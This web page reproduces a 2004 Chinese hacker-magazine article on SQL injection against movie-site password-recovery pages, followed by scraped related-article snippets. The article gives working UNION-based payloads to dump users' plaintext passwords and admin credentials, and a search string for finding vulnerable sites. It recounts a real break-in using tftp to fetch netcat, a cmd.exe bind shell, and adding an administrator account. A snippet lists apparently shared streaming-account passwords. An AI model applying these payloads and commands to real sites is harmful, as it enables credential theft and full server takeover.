SQL注入奇招致胜 UNION查询轻松免费看电影

此文发表在2004年黑客X档案第4期 

周末无聊,同学想让我帮他下载一些电影看,我爽快的答应了。看了这么多期X档案,水平自然长进不少,也没事玩玩"鸡"。这次想免费下载些电影,没问题(我知道N多电影程序有漏洞)。闲话少说,切入正题。

我打开Google,随便搜索了一下电影网站,点开了一个。看了一下界面,知道和金梅电影系统关联很大。金梅系统和"洞"网(7.0安全多啦,自己想的)差不多,也是有N多漏洞,比如注入啊,COOKIE欺骗什么的。我就在X档案03年11期看过一篇文章,写的是用ASC和MID函数对系统管理员帐户进行猜测。我也想用这种方法猜测,猜了半天都没猜对,真烦人,同学还在那边等我哪,这不是很丢人。我决定找个简单的办法,还是读读源码吧!

下载了一个金梅三电影系统,看了一下,这么多个文件,头马上大了。还是在自己电脑上运行一下吧。注册了一个用户,点了一下找回密码,别人说这里有漏洞。看了一下,象是有漏洞的界面,有三个参数,还直接把密码显示出来。好,看一下源码。

39        <% if request("myuserid")="" then %>

...
 

  58   <%else

            set rs=server.createobject("adodb.recordset")

            sql="select password from users where userid='"&request("myuserid")&"'and city='"&request("ask")&"'and adress='"&request("answer")&"'"

            rs.open sql,conn,1,1

            if rs.eof and rs.bof then%>

这里果然没过滤。好多人都想到了可以用上面的方法注入了。能不能有更简单的方法呢?

我仔细考虑语句的形式如下:

select password from users where userid=‘‘ and city=‘‘ and adress='‘

如果用户名,密码提示问题(city),密码提示答案(adress)和表users一行匹配,便打印这行的password,而且是明文的。我想的过程就不写了,后来我想到了一种方法,就是利用union查询。Access功能是很弱的,不能执行命令,不能导出文本,还不能注释。有个子查询可以利用之外,也就剩下这个 union了。

怎么利用呢?先在本机做实验。测试过程简略,直接写有所收获的结果。

要是知道了一个该网站的一个用户名(比如abc),可以这样利用。

在"你注册问题"处填: abc' or  ‘1=1(如果用户名是bcd,就变为bcd' or ‘1=1)

密码提示问题处随便填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

密码提示答案处随便填几个字母或数字,填个a

回车后就看到该用户的密码了,简单吧(如图一)。

其实这样一来,上面的语句就变为:
 

select password from users where userid=‘abc'  or  ‘1=1‘ and city=‘a‘ and adress='a‘

呵呵,程序无条件的执行了,因为被 or ‘1=1'跳过后面的验证了。

 
可是网站用户名也不是轻易得到的啊。别急,得到用户名一样简单。如下:

在"你注册问题"处随便处填几个字母或数字,最好别有符号,容易影响结果: 比如字母a

密码提示问题处和上面一样,随便填:我也填个a

关键是在密码提示答案:我填的是a' union select  userid  from users where oklook>=3 or '0

上面就是要找黄金用户的帐户名(如图二),看到用户名后再用前面的方法找到密码。

可以在where后面加很多参数并赋不同的值可以得到很多帐户。

按上面的填入后输入语句就变成了:

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  userid  from users  where oklook>=3 or '0 ‘
 

细心的读者看到这可能已经想到怎样得到管理员的帐号和密码,不错,也很简单。我也不写过程了,直接写出语句如下:

得到帐号:
 
select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  name  from okwiantgo  where  id>=1 or '0 ‘

得到密码:

select password from users where userid=‘a‘ and city=‘a‘ and adress=' a' union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

 
然后登陆就行了,路径格式为:

http://网站电影路径/findaccout.asp?name=管理员帐号&pwd=管理员密码

回车,很轻松就进管理界面了。(如图三)

有时findaccount.asp可能被改名了,这时只能拿个黄金帐户了。

这个漏洞有很多电影程序有,有的程序表名不是okwiantgo(程序会报告64行属性不对),改成admin或password.,把上面的输入稍微修改一下行了。这样一来不管是多复杂的密码,或者是中文密码都没问题。再猜管理员帐户的时候也要多,where后面的条件多变化才行,否则可能得不到超级管理员。
 

这个漏洞使用很简单,危害极大,轻易可以得到管理员帐户。如果系统配置不当,在upload/uploadmovie.asp允许上传ASP文件,系统就很容易换主人了。我曾经成功渗透过这样一个网站,简单过程叙述如下。

上传一个ASP程序,发现该系统运行SQLSERVER,通过读源文件看到了sa的密码,用sqlexec连接,tftp上传nc.exe。再次dir发现nc被删了,有防火强。用tftp上传nc.jpg肯定万无一失, tftp  -i 我的IP get nc.exe nc.jpg,上传成功。在sqlexec运行

nc.jpg -l -p 99 -e  c\winnt\system32\cmd.exe

nc想必都很熟悉了吧,上面就是再目标机器上开一个99端口监听,同时把cmd.exe重定向到这里,本地连接nc.exe  -vv 目标IP   99,得到shell,而且是管理员权限。

输入 net user abc 123456 /add  &&  net  localgroup administrators abc /add

添加用户成功顺便加入管理员,&&意思是前面成功后面执行。该系统开着3389,省了我好多事情。

好了回到正题,这个漏洞存在80%以上电影程序中,在google里搜索user/wantpws.asp,打开后发现可以输入三个参数,且把密码直接显示的都有此漏洞。

修补方法,应该对三个参数进行严格验证,而且把结果发送的到邮箱里更稳妥,有的网站是这样做的。

总结:我写此问的目的是想说好多问题要多想多试,一个漏洞利用方法不只一种,我们要自己学会发现。入侵过程灵活多样,我们应动脑筋。大家免费看电影的同时可别搞破坏啊,任何后果与我无关。同时我也希望看到这篇文章后,网站尽快更改。

时间: 2024-09-16 16:44:36

SQL注入奇招致胜 UNION查询轻松免费看电影的相关文章

SQL Server-聚焦UNIOL ALL/UNION查询(二十三)

前言 本节我们来看看有关查询中UNION和UNION ALL的问题,简短的内容,深入的理解,Always to review the basics. 初探UNION和UNION ALL 首先我们过一遍二者的基本概念和使用方法,UNION和UNION ALL是将两个表或者多个表进行JOIN,当然表的数据类型必须相同,对于UNION而言它会去除重复值,而UNION ALL则会返回所有数据,这就是二者的区别和使用方法.下面我们来看一个简单的例子. USE TSQL2012 GO --USE UNION

奇艺结盟希杰娱乐免费看韩片

本报讯 (记者 聂晶 实习生 王文彬)记者昨天获悉,高清正版视频网站奇艺与韩国希杰娱乐公司宣布正式达成战略合作,自7月21日开始,包括<飞天舞>.<武士>.<美丽密语>.<我的初恋女友>.<韩国情书>等在内的近200部经典韩国电影将登陆该网站播放.

优酷/爱奇艺/迅雷/乐视怎么免费看VIP高清电影?

爱奇艺会员账号共享2015.9.22 更新时间:08:00 账号:18600407108      密码:cuiyi6639 账号:13560438610      密码:a101871c 账号:121762973@qq.com        密码:wangwei8j 账号:13819836583       密码:caonima123 更新时间:03:00 账号:13181291531       密码:woainihaoq 账号:691323033@qq.com        密码:1214

Nginx防范Sql注入攻击方法总结

基本sql注入原理: 通过union all 联合查询获取其他表的内容(如user表的用户密码) 防御原理: 1. 通过以上配置过滤基本的url中的注入关键字: 2. 当然,数据库中的用户密码得加密存放 : 3. php程序进行二次过滤,过滤GET和POST变量中的关键字: 4. 生产环境关闭PHP和MySQL的错误信息. 对于简单的情况,比如包含单引号' , 分号;, <, >, 等字符可通过rewrite直接重订向到404页面来避免.   用rewrite有个前提需要知道,一般用rewri

SQL注入攻击的原理及其防范措施

攻击 ASP编程门槛很低,新手很容易上路.在一段不长的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到.那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行人很难一眼就看出来罢了.在界面的友好性.运行性能以及网站的安全性方面是新手与老手之间区别的三个集中点.而在安全性方面,新手最容易忽略的问题就是SQL注入漏洞的问题.用NBSI 2.0对网上的一些ASP网站稍加扫描,就能发现许多ASP网站存在SQL注入漏洞,教育网里高校内部机构的一些网站这种漏洞

SQL注入漏洞防范措施与攻击原理

ASP编程门槛很低,新手很容易上路.在一段不长的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到.那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行人很难一眼就看出来罢了.在界面的友好性.运行性能以及网站的安全性方面是新手与老手之间区别的三个集中点.而在安全性方面,新手最容易忽略的问题就是SQL注入漏洞的问题.用NBSI 2.0对网上的一些ASP网站稍加扫描,就能发现许多ASP网站存在SQL注入漏洞,教育网里高校内部机构的一些网站这种漏洞就更普

SQL注入的新技巧

技巧 SQL注入的新技巧 来源:黑客基地                表名和字段名的获得 适用情况: 1)数据库是MSSQL 2)连接数据库的只是普通用户 3)不知道ASP源代码 可以进行的攻击 1)对数据内容进行添加,查看,更改 实例: 本文件以 http://www.dy***.com/user/wantpws.asp 为列进行测试攻击. 第一步: 在输入用户名处输入单引号,显示 Microsoft OLE DB Provider for SQL Server 错误 '80040e14'

java持久层框架mybatis防止sql注入的方法_java

sql注入大家都不陌生,是一种常见的攻击方式,攻击者在界面的表单信息或url上输入一些奇怪的sql片段,例如"or '1'='1'"这样的语句,有可能入侵参数校验不足的应用程序.所以在我们的应用中需要做一些工作,来防备这样的攻击方式.在一些安全性很高的应用中,比如银行软件,经常使用将sql语句全部替换为存储过程这样的方式,来防止sql注入,这当然是一种很安全的方式,但我们平时开发中,可能不需要这种死板的方式. mybatis框架作为一款半自动化的持久层框架,其sql语句都要我们自己来手

Mysql数据库使用concat函数执行SQL注入查询_Mysql

SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来. 例如:原本查询语句是 复制代码 代码如下: select username,email,content from test_table where user_id=uid; 其中uid,是用户输入的.正常显示结果会出现用户名,用户邮箱,用户留言内容.但是如果uid过滤不严,我们可以构造如下SQL语句来获得任意数据表信息. 复制代码 代码如下: u